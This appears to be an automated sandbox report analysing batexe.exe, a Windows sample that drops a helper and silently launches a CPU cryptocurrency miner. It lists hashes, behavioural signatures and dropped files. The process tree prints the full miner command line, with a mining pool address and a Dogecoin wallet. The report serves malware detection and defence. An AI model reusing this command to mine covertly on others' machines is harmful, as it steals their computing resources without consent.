Analysis
-
max time kernel
293s -
max time network
300s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
18/02/2024, 06:19
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 1056 b2e.exe 4084 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4084 cpuminer-sse2.exe 4084 cpuminer-sse2.exe 4084 cpuminer-sse2.exe 4084 cpuminer-sse2.exe 4084 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4820-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4820 wrote to memory of 1056 4820 batexe.exe 85 PID 4820 wrote to memory of 1056 4820 batexe.exe 85 PID 4820 wrote to memory of 1056 4820 batexe.exe 85 PID 1056 wrote to memory of 2620 1056 b2e.exe 86 PID 1056 wrote to memory of 2620 1056 b2e.exe 86 PID 1056 wrote to memory of 2620 1056 b2e.exe 86 PID 2620 wrote to memory of 4084 2620 cmd.exe 89 PID 2620 wrote to memory of 4084 2620 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Users\Admin\AppData\Local\Temp\6F73.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6F73.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6F73.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7271.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4084
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15.7MB
MD587337c8af9f853830b52844da8704131
SHA131d79e9e2c0fe79ad091b3a421707604b4f7ca64
SHA25655055b409a37a458aa894e2bd99af31d8f315d7637bf9f8da1940b8227b2b19b
SHA512b5f8c3226a8f486600fe370253481e179481b783b3c1464e4723a1c04a503a8f0d8a6f0a87945133a5f2b7e0185a0d88ff8e14b5f63fab4921e33123d6c597c5
-
Filesize
5.8MB
MD577751a7a6b15a8c7001312f2224f2e7a
SHA1ca14159035f74267744d8e91a9390a15525d218e
SHA256891fdc54478c2182cabebc9bf03a443c5d6157c070a5c9c13cdbcdcd34c56255
SHA5123543011ffe5ad9a562cf248596724f67750f7cbee3b5839be6a747ad3964bdc8c4e4065e4a7540c2707f554c51921e484a390960e9e957dbd97d9145d1de6997
-
Filesize
5.1MB
MD597e9e80b8924d5092730e62c23d04d59
SHA1138ce6c3b57a5635c32366b1aa19e592f22f0a06
SHA25649d12f184a86b890d08c0ef3bf2051d5012cd15c5cd4b400a54d239bf85b1af5
SHA512cabd382ed7f32c7870c40786c82357def52a7ec10cb4d129be08a53600ba30f3afb9caaa39a7d44c386a15a85f3c38a900b04d7eabf94427eb059e9845dc1ec4
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.0MB
MD5fb964e80fb42c2f3e825f4167ed1f405
SHA10d714cb60d12ea8d4a2ff51ad7d577f54886ffdf
SHA256fed93b77960647aafd07f3fe63c38b0cec82059b929fab7068be63ea619a7154
SHA512afb3be0df0d10f9794d12ffa9adaa2e3c4b82f012a8fd142f954736fc4ce5fb9b4c8400ff801bd0f86d9452440df2d7dcba0615f1c4fea0b01d6929c6e2280d5
-
Filesize
1.7MB
MD5c4eced579addd27bf2de1ff2686565e3
SHA1e9460f35232a025d8d05a095d253b5888900f289
SHA2569bc8464de00a6a1c5751cfe67f252abea1ac2fb223b3d373c9e61150faf1d0ef
SHA512b5c2fb383cdb69c56201ef90676fba8633232af054b37989680b312575b0ac9e12264d96cace831d2f7a79f2b779b0596a8cbbb548ad341458dde212ccad8e10
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
2.0MB
MD57a7dc7bd20b4f478260b7c71dc9ce6d3
SHA140fff51b7bd29b6bcbb7a58daba6b1f50eaa19d7
SHA25603968bb8351ebd86149ca34f3f12a77755d25b5ddda3b041b635a887134b55dc
SHA512cbd3634de7ebf07a7de80f2fafb4a20708dd449d08915f9c1fafa72ca0fbdc910dac819fd0bd28a35e2cbf2afa39a2a21e24b8b902fd37321f8979a144398c67
-
Filesize
2.9MB
MD529f36365230a04021a2bd768de88f449
SHA13e70a52a9d5be9df76b82e9be0a359e6a59ef8ee
SHA2561204f1d1c6bc187f1d1bc3afa0f6211672e3f9718ba955a3be54feb45a2e5bda
SHA51286271550b038556280632a1d30d434cb6d85eb6a269ab13ec11cff72d2b874b320a0e106058a85b7aaec59083f9e7b42d65b0232cbff4521cf1a47ec840c6c66
-
Filesize
2.5MB
MD5c1be7205e8513836287961beed07e3d9
SHA13fb00d35699abb9d69b842dedfce7893fce70450
SHA25656ed916d04de180bdbff0bd2cd3e7337681b7924ce4334b966b87e29faa88f72
SHA5123d1e2346cd52fd1f473fc393e62a689ce7649e601b4dd4c7d588b8338df7f598aa461a962cf3e1881a435a0a6b613e451bb95955e38912dadbff71aba716a013
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770